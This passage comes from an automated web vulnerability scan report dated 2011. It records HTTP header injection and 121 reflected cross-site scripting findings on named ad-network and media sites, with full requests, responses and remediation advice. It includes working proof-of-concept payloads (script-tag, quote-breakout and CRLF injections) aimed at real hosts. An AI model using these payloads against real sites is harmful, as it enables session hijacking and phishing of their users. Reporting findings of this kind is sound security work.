ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=210
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:33 GMT
Content-Length: 950
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='54f5b

...[SNIP]...

4.2. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-504/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 386bc%0d%0a457ad93187f was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-504/c5/jsc/fmr.js?c=825/403/1&a=0&f=&n=305&r=13&d=15&q=&$=386bc%0d%0a457ad93187f&s=263&z=0.7735994893591851 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:386bc
457ad93187f,54f5b;expires=Sun, 04 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,825,15:305,825,0:0,825,15:305,0,15:0,0,0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=37:9:9:1:1;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "cff199-8747-4aa4e7838c500"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=192
Expires: Sun, 04 Sep 2011 01:08:03 GMT
Date: Sun, 04 Sep 2011 01:04:51 GMT
Content-Length: 948
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=263;var zzPat='386bc

...[SNIP]...

4.3. http://c7.zedo.com/utils/ecSet.js [v parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload 72e24%0d%0acc2e3ed201c was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=72e24%0d%0acc2e3ed201c&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 72e24
cc2e3ed201c;expires=Tue, 04 Oct 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1466
Date: Sun, 04 Sep 2011 01:05:04 GMT
Connection: close

4.4. http://tacoda.at.atwola.com/rtx/r.js [si parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 8a172%0d%0a0373f631884 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=LCN&si=8a172%0d%0a0373f631884&pi=-&xs=3&pu=http%253A//www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html%253Fifu%253Dhttp%25253A//www.google.com/trends/hottrends%25253Fq%25253Dsprint%252526date%25253D2011-9-3%252526sa%25253DX&df=1&v=6.0&cb=85182 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:51 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:21:51 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:06:51 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:06:51 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100211|17778^1315097086^1315100209|58dcd76bcc7cba0a0aa9256e^1315098376^1315100176|1777858dcd76b8a6d1b89539c8834^1315098377^1315100177|8a172
0373f631884^1315098411^1315100211; path=/; expires=Sun, 04-Sep-11 01:36:51 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:06:51 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:06:51 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:06:51 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();

5. Cross-site scripting (reflected) previous next
There are 121 instances of this issue:

http://ad.turn.com/server/pixel.htm [fpid parameter]
http://ad.turn.com/server/pixel.htm [sp parameter]
http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]
http://admeld.adnxs.com/usersync [admeld_callback parameter]
http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [height parameter]
http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [wcguid parameter]
http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [width parameter]
http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [mpt parameter]
http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [mpvc parameter]
http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [name of an arbitrarily supplied request parameter]
http://api.bit.ly/shorten [callback parameter]
http://api.bit.ly/shorten [longUrl parameter]
http://api.bizographics.com/v1/profile.redirect [api_key parameter]
http://api.bizographics.com/v1/profile.redirect [callback_url parameter]
http://api.echoenabled.com/v1/search [q parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c10 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]
http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]
http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]
http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]
http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]
http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]
http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]
http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]
http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]
http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter]
http://control.adap.tv/control [as parameter]
http://control.adap.tv/control [categories parameter]
http://control.adap.tv/control [context parameter]
http://control.adap.tv/control [eov parameter]
http://control.adap.tv/control [height parameter]
http://control.adap.tv/control [htmlEnabled parameter]
http://control.adap.tv/control [isTop parameter]
http://control.adap.tv/control [keywords parameter]
http://control.adap.tv/control [name of an arbitrarily supplied request parameter]
http://control.adap.tv/control [pageUrl parameter]
http://control.adap.tv/control [sessionId parameter]
http://control.adap.tv/control [width parameter]
http://digg.com/submit [REST URL parameter 1]
http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]
http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
http://imp.fetchback.com/serve/fb/adtag.js [type parameter]
http://jlinks.industrybrains.com/jsct [ct parameter]
http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]
http://jlinks.industrybrains.com/jsct [tr parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://js.www.reuters.com/recommend/re/re [callback parameter]
http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]
http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]
http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]
http://r.turn.com/server/pixel.htm [fpid parameter]
http://r.turn.com/server/pixel.htm [sp parameter]
http://rtq.careerbuilder.com/RTQ/jobstream.aspx [lr parameter]
http://rtq.careerbuilder.com/RTQ/jobstream.aspx [rssid parameter]
http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]
http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]
http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]
http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard [mbox parameter]
http://trc.taboolasyndication.com/reuters/trc/2/json [cb parameter]
http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx [name of an arbitrarily supplied request parameter]
http://www.idg.com/www/rd.nsf/rd [REST URL parameter 1]
http://www.idg.com/www/rd.nsf/rd [REST URL parameter 3]
http://www.idg.com/www/rd.nsf/rd [name of an arbitrarily supplied request parameter]
http://www.linkedin.com/countserv/count/share [url parameter]
http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [callback parameter]
http://www.reuters.com/assets/commentsChild [articleId parameter]
http://www.reuters.com/assets/commentsChild [channel parameter]
http://www.reuters.com/assets/searchIntercept [blob parameter]
http://www.reuters.com/tracker/guid [cb parameter]
https://www.sprint.net/ [name of an arbitrarily supplied request parameter]
https://www.sprint.net/external_videos/pages.php [REST URL parameter 1]
https://www.sprint.net/external_videos/pages.php [REST URL parameter 2]
https://www.sprint.net/index.php [REST URL parameter 1]
https://www.sprint.net/index.php [name of an arbitrarily supplied request parameter]
https://www.sprint.net/min/ [REST URL parameter 1]
http://www.und.com/allaccess/ [REST URL parameter 1]
http://www.und.com/favicon.ico [REST URL parameter 1]
http://www.und.com/gametracker/launch/ [REST URL parameter 1]
http://www.und.com/gametracker/launch/ [REST URL parameter 2]
http://www.und.com/nd.ico [REST URL parameter 1]
http://www.und.com/photogallery/ [REST URL parameter 1]
http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 1]
http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 2]
http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 3]
http://www.und.com/sports/m-footbl/9873956 [name of an arbitrarily supplied request parameter]
http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 1]
http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 2]
http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 3]
http://www.und.com/sports/m-footbl/9874134 [name of an arbitrarily supplied request parameter]
http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 1]
http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 2]
http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 3]
http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 4]
http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 5]
http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 6]
http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 7]
http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 1]
http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 2]
http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 3]
http://www.careerbuilder.com/ [Referer HTTP header]
http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx [Referer HTTP header]
http://www.careerbuilder.com/JobSeeker/Jobs/JobDetails.aspx [Referer HTTP header]
http://www.careerbuilder.com/JobSeeker/Jobs/JobQuery.aspx [Referer HTTP header]
http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx [Referer HTTP header]
http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx [Referer HTTP header]
http://www.careerbuilder.com/PLI/R/JSToolkit.htm [Referer HTTP header]
http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx [Referer HTTP header]
http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx [Referer HTTP header]
http://www.sologig.com/ [Referer HTTP header]
http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html [ruid cookie]
http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js [ruid cookie]
http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js [ruid cookie]
http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [xa cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

5.1. http://ad.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53bfc"><script>alert(1)</script>20c739125c2 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=53bfc"><script>alert(1)</script>20c739125c2&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8995059535480416422; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:05:50 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:05:49 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8995059535480416422&rnd=3834016449463094093&fpid=53bfc"><script>alert(1)</script>20c739125c2&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.2. http://ad.turn.com/server/pixel.htm [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72a99"><script>alert(1)</script>d633ab318d4 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=6&sp=72a99"><script>alert(1)</script>d633ab318d4 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8995059535480416422; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:05:50 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:05:49 GMT
Content-Length: 384

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8995059535480416422&rnd=3302508506972481702&fpid=6&nu=n&t=&sp=72a99"><script>alert(1)</script>d633ab318d4&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.3. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b566b'-alert(1)-'5473cd1b396 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=193b566b'-alert(1)-'5473cd1b396&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:02:33 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=9223372036854775807; path=/; expires=Sat, 03-Dec-2011 01:02:33 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 01:02:33 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193b566b'-alert(1)-'5473cd1b396&external_user_id=9223372036854775807&expiration=0" width="0" height="0"/>');

5.4. http://admeld.adnxs.com/usersync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e2bb'-alert(1)-'8f47cdc553a was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /usersync?calltype=admeld&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match5e2bb'-alert(1)-'8f47cdc553a HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; sess=1; uuid2=6422714091563403120; anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+UxXE$1ICe*b^.=BJe(Od$<_TyZV2FP?n>[#!9X=V13(0V-n(2[>dH7.).LuM^sXd=GCF-/bO1P3I*!2a3C06.$K

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:02:53 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=9223372036854775807; path=/; expires=Sat, 03-Dec-2011 01:02:53 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Sun, 04 Sep 2011 01:02:53 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match5e2bb'-alert(1)-'8f47cdc553a?admeld_adprovider_id=193&external_user_id=9223372036854775807&expiration=0" width="0" height="0"/>');

5.5. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [height parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://affiliates.eblastengine.com
Path:	/Widgets/EmailSignup.aspx

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5c8f"style%3d"x%3aexpression(alert(1))"39952ff8d9c was submitted in the height parameter. This input was echoed as d5c8f"style="x:expression(alert(1))"39952ff8d9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Widgets/EmailSignup.aspx?wcguid=29DFC999-F0F3-482A-9516-C8414B36C6AD&height=100d5c8f"style%3d"x%3aexpression(alert(1))"39952ff8d9c&width=275 HTTP/1.1
Host: affiliates.eblastengine.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=60
Content-Type: text/html; charset=utf-8
Expires: Sun, 04 Sep 2011 01:04:01 GMT
Last-Modified: Sun, 04 Sep 2011 01:03:01 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sun, 04 Sep 2011 01:03:00 GMT
Content-Length: 6969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Email S
...[SNIP]...
<table id="tblWidget" cellpadding="0" cellspacing="0" border="0" style="width:275px;height:100d5c8f"style="x:expression(alert(1))"39952ff8d9cpx;">
...[SNIP]...

5.6. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [wcguid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://affiliates.eblastengine.com
Path:	/Widgets/EmailSignup.aspx

Issue detail

